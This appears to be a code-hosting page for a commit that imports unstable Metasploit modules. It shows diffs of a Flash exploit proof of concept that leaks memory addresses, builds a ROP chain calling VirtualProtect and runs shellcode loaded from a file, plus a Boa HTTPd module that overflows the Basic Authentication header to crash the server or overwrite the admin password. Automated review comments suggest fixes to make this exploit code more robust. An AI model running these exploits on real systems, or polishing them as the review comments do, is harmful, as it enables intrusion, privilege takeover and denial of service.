
Commit 3737247

unstable branch from msf trunk
Hopefully this will get more people using and fixing the module. Please submit pull requests if you have fixes to any of these, or, if they are stable, submit pull requests directly to the msf team.
1 parent c2be73b commit 3737247

97 files changed

+16633
-0
lines changed


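--- a/data/dns_mitm.txt
+++ b/data/dns_mitm.txt
@@ -0,0 +1 @@
+192.168.0.2 google.com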
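--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,33 @@
+package poc {
+
+import flash.display.*;
+import flash.events.*;
+import flash.net.*;
+
+public class Download extends Sprite
+{
+
+public var myLoader:URLLoader = new URLLoader();
+public var buf:String = new String();
+
+public function init():void
+{
+var urlRequest:URLRequest = new URLRequest("test.bin");
+myLoader.dataFormat = URLLoaderDataFormat.BINARY;
+myLoader.addEventListener(Event.COMPLETE, onComplete);
+myLoader.load(urlRequest);
+}
+
+
+public function onComplete(e:Event):void
+{
+buf = myLoader.data;
+dispatchEvent(new Event(Event.COMPLETE));
+}
+
+public function getBinary():String {
+return buf;
+}
+
+}
+}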
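Review bot: A failed load never reaches the caller: `init()` registers only `Event.COMPLETE` on `myLoader`, so an `IOErrorEvent.IO_ERROR` or `SecurityErrorEvent.SECURITY_ERROR` raised by `myLoader.load(urlRequest)` is unhandled and anything listening for this class's own COMPLETE event (dispatched only from `onComplete`) waits indefinitely. Add `myLoader.addEventListener(IOErrorEvent.IO_ERROR, onError);` and `myLoader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onError);` next to the existing listener, with an `onError` handler that at least traces the event and dispatches something the caller can act on; both event classes are already covered by `import flash.events.*`. Separately, `dataFormat` is set to `URLLoaderDataFormat.BINARY`, so `myLoader.data` is a ByteArray, yet `buf` is typed `String` and `buf = myLoader.data;` relies on implicit conversion; either type `buf` as `ByteArray` or add a comment such as `// NOTE: BINARY data is coerced to String here on purpose — confirm callers expect that` so the intended representation is explicit.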
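--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,29 @@
+package poc {
+public class Original_Class
+{
+public static function static_func1(leak:uint,imageBase:uint):Original_Class
+{
+return null;
+}
+
+public static function ROPPayload(imageBase:uint, leak2:uint):uint
+{
+return 1;
+}
+
+public function normal_func():uint
+{
+return 0;
+}
+
+public static function strToInt(param_in:String)
+{
+}
+
+public static function shellcode():uint
+{
+return 1;
+}
+}
+
+}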
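Review bot: `strToInt(param_in:String)` is the only method in this class with neither a return type annotation nor a body, while every sibling here declares a return type and the same-named method in `Real_Ref_Class` is declared `:uint`; nothing on the page says whether that asymmetry is deliberate. If it is, a one-line comment above it, e.g. `// NOTE: untyped return and empty body are intentional — do not align with Real_Ref_Class.strToInt`, would stop a later cleanup from silently changing it; if it is not, declare the return type to match. The class also has no header comment describing its relationship to `Real_Ref_Class`, which shares every method name but different signatures, so a reader has no way to tell which one is meant to be the reference.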
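--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,130 @@
+package poc {
+
+import flash.display.Sprite
+import flash.utils.*
+
+public class Real_Ref_Class
+{
+public static function static_func1(objectLeak:uint ,imageBase:uint):String
+{
+var address:uint = objectLeak ;
+var b:ByteArray = new ByteArray();
+b.writeInt(address);
+
+
+var str:String = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + String.fromCharCode(b[3],b[2],b[1],b[0]);
+return str;
+}
+
+public static function ROPPayload(imageBase:uint ,shellcodeAddrLeak:uint):String
+{
+var b:ByteArray = new ByteArray();
+var address:uint = imageBase + 0xfa851;
+var t:ByteArray = new ByteArray();
+t.writeInt(address);
+b.writeByte(t[3]);
+b.writeByte(t[2]);
+b.writeByte(t[1]);
+b.writeByte(t[0]); // stack pivot address (flash10h.ocx)
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+address = imageBase + 0x034D976;
+t = new ByteArray();
+t.writeInt(address);
+b.writeByte(t[3]);
+b.writeByte(t[2]);
+b.writeByte(t[1]);
+b.writeByte(t[0]); //Fill edi, esi, ebp with parameters (flash10h.ocx)
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x47474747);
+address = shellcodeAddrLeak;
+t = new ByteArray();
+t.writeInt(address);
+b.writeByte(t[3]);
+b.writeByte(t[2]);
+b.writeByte(t[1]);
+b.writeByte(t[0]); // edi Shellcode address
+b.writeUnsignedInt(0x00200000); // esi size
+b.writeUnsignedInt(0x40000000); // ebp permission
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+address = imageBase + 0x34D962;
+t = new ByteArray();
+t.writeInt(address);
+b.writeByte(t[3]);
+b.writeByte(t[2]);
+b.writeByte(t[1]);
+b.writeByte(t[0]); // call VirtualProtect (flash10h.ocx)
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+address = shellcodeAddrLeak;
+t = new ByteArray();
+t.writeInt(address);
+b.writeByte(t[3]);
+b.writeByte(t[2]);
+b.writeByte(t[1]);
+b.writeByte(t[0]); // shellcode address
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+b.writeUnsignedInt(0x41414141);
+
+return b.toString();
+}
+
+public static function strToInt(param_in:String):uint
+{
+var a:uint = parseInt(param_in);
+a = a | 0x00000007
+return a;
+}
+
+public static var shell:String = new String();
+
+public static function setShellcode(buf:String):void
+{
+shell = buf;
+}
+
+public static function shellcode():String //return a alphanumeric encoded calc.exe shellcode
+{
+return shell;
+}
+
+}
+
+}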
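Review bot: The trailing comment on `shellcode()` (`//return a alphanumeric encoded calc.exe shellcode`) no longer describes the code: the method returns `shell`, which is whatever string was last passed to `setShellcode(buf)`, and nothing in this class constrains its content. Replace it with `// returns whatever setShellcode() last stored (empty string until then)` so the comment stays true regardless of what the caller loads. In `strToInt`, `a = a | 0x00000007` is the only statement in the file that relies on automatic semicolon insertion and the OR carries no explanation; add the semicolon and a short why-comment, or at least `// TODO(review): document why the low three bits are forced on`. Minor: the `import flash.display.Sprite` and `import flash.utils.*` lines also lack semicolons, inconsistently with the other files in this commit.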
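--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,93 @@
+// compile >mxmlc -source-path=c:\ C:\poc\main.as
+// decompress using SWF_Compressor
+// change 07 01 02 07 |01| 03 07 02 05 -> 07 01 02 07 01 |02| 07 02 05
+// Shahin [at] abysssec.com
+// twitter: @abysssec
+
+package poc
+{
+
+import flash.utils.*;
+import flash.display.*;
+import flash.text.*;
+import flash.external.*
+import flash.events.*;
+
+public class main extends Sprite
+{
+
+public var d:Download = new Download();
+
+function get get_test1():Real_Ref_Class
+{
+return null;
+}
+
+public function main()
+{
+d.addEventListener(Event.COMPLETE, onLoad);
+d.init();
+}
+
+public function onLoad(e:Event):void {
+var payload:String = d.getBinary();
+Real_Ref_Class.setShellcode(payload);
+sploit();
+}
+
+public function sploit()
+{
+/////////////////////// LEAK IMAGE BASE ////////////////////////////
+
+var objshellcode:uint = Original_Class.shellcode();
+var p_objshellcode:uint = objshellcode & 0xFFFFFFF8;
+
+var str_objshellcode:String = p_objshellcode.toString();
+var int_str_objshellcode = Original_Class.strToInt(str_objshellcode);
+
+var z:Number = new Number(int_str_objshellcode);
+var b:ByteArray = new ByteArray();
+b.writeDouble(z);
+var res:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
+
+var imageBase:uint = res - 0X004E2F58;
+
+
+/////////////////// LEAK SHELLCODE STRING ADDRESS /////////////////
+
+var temp:uint = p_objshellcode + 0x8;
+
+str = temp.toString();
+istr = Original_Class.strToInt(str);
+
+z = new Number(istr);
+
+b = new ByteArray();
+b.writeDouble(z);
+var SHELLCODELeak = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
+
+
+///////////////////// LEAK ROPPayload ADDRESS /////////////////
+
+var objROPPayload:uint = Original_Class.ROPPayload(imageBase,SHELLCODELeak);
+var temp2:uint = objROPPayload & 0xFFFFFFF8;
+var str:String = temp2.toString();
+var istr = Original_Class.strToInt(str);
+
+temp = temp2 + 0x8;
+
+str = temp.toString();
+istr = Original_Class.strToInt(str);
+
+z = new Number(istr);
+
+b = new ByteArray();
+b.writeDouble(z);
+var ROPPayloadLeak:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
+
+var obj:Original_Class = Original_Class.static_func1(ROPPayloadLeak, imageBase);
+obj.normal_func();
+}
+}
+
+}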
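Review bot: In `sploit()`, `str` and `istr` are assigned in the "LEAK SHELLCODE STRING ADDRESS" part (`str = temp.toString();` / `istr = Original_Class.strToInt(str);`) before their `var str:String` / `var istr` declarations appear further down in the "LEAK ROPPayload ADDRESS" part; this compiles only because ActionScript hoists function-scoped `var`s, and it reads as use-before-declaration. Move both declarations to the top of `sploit()` and turn the later two `var` lines into plain assignments, so the three leak steps use the variables in the order a reader expects. Style points in the same method: `sploit()` and the constructor declare no return type while `onLoad` does, `int_str_objshellcode` and `SHELLCODELeak` are untyped where neighbouring locals are `:uint`, and `0X004E2F58` is the only constant written with an uppercase `X`; the three identical `b[4]*0x1000000 + … + b[7]` expressions would also read better as one small private helper. The `import flash.external.*` line is missing its semicolon, unlike the imports around it.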
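--- a/PATH_NOT_SHOWN_ON_PAGE/boa_auth_dos.rb
+++ b/PATH_NOT_SHOWN_ON_PAGE/boa_auth_dos.rb
@@ -0,0 +1,99 @@
+##
+# $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Auxiliary::Dos
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Boa HTTPd Basic Authentication Overflow',
+'Description' =>
+%q{
+The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+allows denial of service or possibly authentication bypass
+via a Basic Authentication header with a user string greater than 127 characters. You must set
+the request URI to the directory that requires basic authentication.
+},
+'Author' =>
+[
+'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+],
+'License' => MSF_LICENSE,
+'Version' => '$Revision$',
+'References' =>
+[
+[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
+],
+'DisclosureDate' => 'Sep 10 2007'))
+
+register_options(
+[
+Opt::RPORT(80),
+OptString.new('URI', [ true, "The request URI", '/']),
+OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
+], self.class)
+end
+
+def check
+begin
+res = send_request_cgi({
+'uri'=>'/',
+'method'=>'GET'
+})
+if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+print_status("Boa Version Detected: #{m[1]}")
+return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+return Exploit::CheckCode::Vulnerable
+else
+print_status("Not a Boa Server!")
+return Exploit::CheckCode::Safe # not a boa server
+end
+rescue Rex::ConnectionRefused
+print_error("Connection refused by server.")
+return Exploit::CheckCode::Safe
+end
+end
+
+def run
+if check == Exploit::CheckCode::Vulnerable
+datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
+datastore['BasicAuthPass'] = datastore['PASSWORD']
+res = send_request_cgi({
+'uri'=> datastore['URI'],
+'method'=>'GET'
+})
+if (res != nil)
+print_status("Server still operational... checking to see if password has been overwritten.")
+datastore['BasicAuthUser'] = 'admin'
+res = send_request_cgi({
+'uri'=>datastore['URI'],
+'method'=>'GET'
+})
+if (res.code == 200)
+print_status("Access successful with admin:#{datastore['PASSWORD']}")
+elsif (res.code != 401)
+print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
+else
+print_status("Access forbidden, this module has failed.")
+end
+else
+print_status("Denial of Service has succeeded.")
+end
+end
+end
+end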
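Review bot: In `check`, `res.headers['Server'].match(/Boa\/(.*)/)` raises NoMethodError whenever the server answers without a Server header, because the `res and` guard only covers a nil response; change the condition to `if (res and res.headers['Server'] and (m = res.headers['Server'].match(/Boa\/(.*)/)))`. The version test on the following lines indexes `m[1][3]`, so a banner shorter than four characters (e.g. `Boa/0.9`) would also raise rather than return Safe; that deserves a length guard or at least a comment stating the assumed `X.YY.Z` banner shape. In `run`, the second `send_request_cgi` result is dereferenced as `res.code` without the nil check applied to the first request, so a server that drops the follow-up connection crashes the module instead of reporting; add `return print_error("No response to the admin request; the server may have gone down.") unless res` before `if (res.code == 200)`. The description string spells `extention` and the status message `occured`; they should read `extension` and `occurred`, and the "this module has failed" line would be clearer as `print_error` than `print_status`.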
